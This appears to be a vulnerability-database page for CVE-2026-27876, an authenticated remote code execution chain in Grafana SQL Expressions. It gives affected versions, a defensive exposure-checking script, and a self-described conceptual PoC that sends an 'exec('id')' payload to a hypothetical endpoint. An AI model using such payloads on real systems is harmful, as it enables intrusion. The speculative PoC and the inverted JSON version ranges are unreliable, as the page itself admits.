Security Vulnerability Report
CVE-2026-27876 CVSS 9.1 CRITICAL

Published: 2026-03-27 15:16:51
Last Modified: 2026-04-02 16:16:21

Description

A chained attack via SQL Expressions and a Grafana Enterprise plugin can lead to a remote arbitrary code execution impact (RCE). This is enabled by a feature in Grafana (OSS), so all users are always recommended to update to avoid future attack vectors going this path.

Only instances with the sqlExpressions feature toggle enabled are vulnerable.

Only instances in the following version ranges are affected:

- 11.6.0 (inclusive) to 11.6.14 (exclusive): 11.6.14 has the fix. 11.5 and below are not affected.
- 12.0.0 (inclusive) to 12.1.10 (exclusive): 12.1.10 has the fix. 12.0 did not receive an update, as it is end-of-life.
- 12.2.0 (inclusive) to 12.2.8 (exclusive): 12.2.8 has the fix.
- 12.3.0 (inclusive) to 12.3.6 (exclusive): 12.3.6 has the fix.
- 12.4.0 (inclusive) to 12.4.2 (exclusive): 12.4.2 has the fix.

13.0.0 and above also have the fix: no v13 release is affected.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:* - VULNERABLE (five cpeMatch entries, one per release line; the CPE matches only the enterprise edition because the chain needs a Grafana Enterprise plugin, while the description still recommends that all users update)
Grafana 11.6.0 (inclusive) to 11.6.14 (exclusive)
Grafana 12.0.0 (inclusive) to 12.1.10 (exclusive)
Grafana 12.2.0 (inclusive) to 12.2.8 (exclusive)
Grafana 12.3.0 (inclusive) to 12.3.6 (exclusive)
Grafana 12.4.0 (inclusive) to 12.4.2 (exclusive)

Caveat: the cpeMatch entries in the Raw JSON Data section below carry the complementary intervals (versionEndExcluding 11.6.0, then 11.6.14 to 12.0.0, 12.1.10 to 12.2.0, 12.2.8 to 12.3.0 and 12.3.6 to 12.4.0), which are the fixed and unaffected builds rather than the vulnerable ones. The ranges listed above follow the description and the vendor advisory; do not drive patch decisions from the JSON cpeMatch data on this page.
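
The version ranges and the sqlExpressions feature-toggle condition are the two facts an operator needs in order to decide whether an instance is exposed. The following Python is an added example written for this page, not code from the page, from Grafana or from the advisory. It encodes the advisory's ranges as half-open intervals, reads the [feature_toggles] section of grafana.ini (Grafana accepts both the "enable = toggleA,toggleB" list form and the "sqlExpressions = true" key form; the precedence between the two is an assumption here), reads a /api/frontend/settings-style response (assumed shape: buildInfo.version and a featureToggles map; the page does not confirm this), and combines both into a verdict. The ini text and the settings document are constructed samples. Dropping pre-release and build suffixes such as "+security-01" before comparing is an assumption about Grafana's version strings.

```python
import json
import re

# Affected ranges from the advisory: [first affected, first fixed) per release line.
AFFECTED_RANGES = [
    ((11, 6, 0), (11, 6, 14)),
    ((12, 0, 0), (12, 1, 10)),
    ((12, 2, 0), (12, 2, 8)),
    ((12, 3, 0), (12, 3, 6)),
    ((12, 4, 0), (12, 4, 2)),
]

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) from a Grafana version string.

    Assumption: pre-release and build suffixes such as '-pre' or
    '+security-01' never change which release line a build belongs to,
    so only the numeric triple is compared.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(x) for x in m.groups())


def version_in_affected_range(version):
    """True if the version falls inside one of the advisory's half-open ranges."""
    v = parse_version(version)
    return any(start <= v < fixed for start, fixed in AFFECTED_RANGES)


def sql_expressions_enabled_in_ini(ini_text):
    """Read the [feature_toggles] section of a grafana.ini text.

    Assumed precedence: the 'enable = a,b' list form can only switch the
    toggle on; an explicit 'sqlExpressions = true|false' key sets it either
    way, the last occurrence winning.
    """
    in_section = False
    enabled = False
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].split("#", 1)[0].strip()  # drop ini comments
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[feature_toggles]"
            continue
        if not in_section or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key == "enable":
            if "sqlExpressions" in [t.strip() for t in value.split(",")]:
                enabled = True
        elif key == "sqlExpressions":
            enabled = value.lower() in ("true", "1", "yes", "on")
    return enabled


def assess(version, sql_expressions_enabled):
    """Combine the version check and the toggle state into (exposed, reason)."""
    if not version_in_affected_range(version):
        return False, "version outside the affected ranges"
    if not sql_expressions_enabled:
        return False, "affected version but sqlExpressions is off; update before enabling it"
    return True, "affected version with sqlExpressions enabled; update now"


def assess_frontend_settings(settings):
    """Assess a parsed /api/frontend/settings response.

    Assumed shape (not confirmed by this page): buildInfo.version holds the
    server version and featureToggles maps toggle names to booleans.
    """
    version = settings["buildInfo"]["version"]
    toggles = settings.get("featureToggles", {})
    return assess(version, bool(toggles.get("sqlExpressions", False)))


# Constructed samples for a stand-alone run; not captured from a real instance.
SAMPLE_INI = """
[server]
http_port = 3000

[feature_toggles]
; constructed sample
enable = publicDashboards,sqlExpressions
"""

SAMPLE_SETTINGS = json.loads(
    '{"buildInfo": {"version": "12.3.5", "edition": "Enterprise"},'
    ' "featureToggles": {"sqlExpressions": true}}'
)

if __name__ == "__main__":
    print("ini toggle on:", sql_expressions_enabled_in_ini(SAMPLE_INI))
    for v in ("11.5.9", "11.6.0", "11.6.14+security-01", "12.1.9", "12.4.2", "13.0.0"):
        print(v, assess(v, True))
    print("frontend settings:", assess_frontend_settings(SAMPLE_SETTINGS))
```

Run it as a script to see the verdict for each sample version; in practice feed it the real grafana.ini (or the GF_FEATURE_TOGGLES_ENABLE environment value split the same way) and the live frontend settings document. A boundary version such as 11.6.14 or 12.4.2 is the first fixed build of its line and is reported as not affected, while 12.1.10 is reported fixed even though 12.0.x never received an update.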

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# This is a conceptual Proof of Concept (PoC) for CVE-2026-27876.
# Actual exploitation requires a valid Grafana instance with 'sqlExpressions'
# enabled and a high-privileged user account. The endpoint and the SQL payload
# below are placeholders derived from the advisory description, not a verified
# exploit chain.

TARGET_URL = "http://localhost:3000"
API_KEY = "YOUR_ADMIN_API_KEY"  # Requires High Privilege (PR:H)

headers = {
    "Authorization": f"Bearer {API_KEY}",
    "Content-Type": "application/json",
}

# Malicious payload targeting the SQL Expression feature.
# This payload attempts to execute a command (e.g., id) via the SQL injection chain.
payload = {
    "queries": [
        {
            "refId": "A",
            "expr": "SELECT exec('id')",  # Conceptual SQL Expression payload
            "datasourceId": 1,
        }
    ]
}

try:
    # Sending request to the vulnerable endpoint (hypothetical endpoint based on description)
    response = requests.post(
        f"{TARGET_URL}/api/datasources/proxy/1/query",
        headers=headers,
        json=payload,
        timeout=10,
    )
    if response.status_code == 200:
        print("[+] Request sent successfully. Check output for RCE indication.")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.RequestException as e:
    print(f"[!] Error: {e}")

References

https://grafana.com/security/security-advisories/cve-2026-27876 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27876", "sourceIdentifier": "[email protected]", "published": "2026-03-27T15:16:50.920", "lastModified": "2026-04-02T16:16:21.140", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A chained attack via SQL Expressions and a Grafana Enterprise plugin can lead to a remote arbitrary code execution impact (RCE). This is enabled by a feature in Grafana (OSS), so all users are always recommended to update to avoid future attack vectors going this path.\n\nOnly instances with the sqlExpressions feature toggle enabled are vulnerable.\n\nOnly instances in the following version ranges are affected:\n\n- 11.6.0 (inclusive) to 11.6.14 (exclusive): 11.6.14 has the fix. 11.5 and below are not affected.\n- 12.0.0 (inclusive) to 12.1.10 (exclusive): 12.1.10 has the fix. 12.0 did not receive an update, as it is end-of-life.\n- 12.2.0 (inclusive) to 12.2.8 (exclusive): 12.2.8 has the fix.\n- 12.3.0 (inclusive) to 12.3.6 (exclusive): 12.3.6 has the fix.\n- 12.4.0 (inclusive) to 12.4.2 (exclusive): 12.4.2 has the fix. \n13.0.0 and above also have the fix: no v13 release is affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "11.6.0", "matchCriteriaId": "2B1C33F0-5D24-493C-BD5E-78C4B79DEC58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "11.6.14", "versionEndExcluding": "12.0.0", "matchCriteriaId": "94F2B4A1-DE4B-4718-A4D2-FBAE0711CC94"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "12.1.10", "versionEndExcluding": "12.2.0", "matchCriteriaId": "B77BDF7D-60F5-4DA0-B530-D8B69B7BA9B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "12.2.8", "versionEndExcluding": "12.3.0", "matchCriteriaId": "03B82BEE-3BE4-466C-B50D-900DDD46277A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "12.3.6", "versionEndExcluding": "12.4.0", "matchCriteriaId": "84C9E335-11FD-45E6-8804-2392B0AE11F7"}]}]}], "references": [{"url": "https://grafana.com/security/security-advisories/cve-2026-27876", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}